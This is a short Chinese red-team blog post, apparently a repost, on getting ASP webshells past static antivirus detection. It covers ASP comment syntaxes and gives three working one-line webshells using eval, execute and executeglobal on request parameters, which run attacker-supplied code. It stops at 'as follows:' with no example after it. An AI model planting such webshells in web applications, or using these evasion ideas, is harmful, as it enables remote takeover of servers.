本文来自“白帽子社区红队知识星球”
作者:Xx
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境,可⽤来创建动态 交互式⽹⻚并建⽴强⼤的web应⽤程序。当服务器收到对ASP⽂件的请求时,它会处理包含在⽤于构建 发送给浏览器的HTML(Hyper Text Markup Language,超⽂本标记语⾔)⽹⻚⽂件中的服务器端 脚本代码。除服务器端脚本代码外,ASP⽂件也可以包含⽂本、HTML(包括相关的客户端脚本)和com 组件调⽤
注释
asp 脚本⽀持5中注释的⽅式
' 单引号 (单⾏注释)REM rem+空格 (单⾏注释)// 双斜线 (单⾏注释,VBscript,JScript可⽤,仅⽀持IIS)<!-- --> HTML注释符 (单⾏注释,VBscript可⽤,仅⽀持IIS)/* */ 多⾏注释符 (多⾏注释,JScript可⽤)
函数
在asp 中,通常使⽤以下三个vbscript函数来执⾏代码
eval 函数
<% eval request(1) %>
execute 函数
<% execute request(1) %>
executeglobal request
<% executeglobal request(1) %>⼀般检测都是对以上三个敏感函数进⾏检测
⽹上有公开的使⽤utf-7 进⾏编码的脚本,但是这样的早已被软件加⼊了⿊名单,直接使⽤的话会被标记 如下:
原文始发于微信公众号(白帽子社区):ASP静态免杀方式研究
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论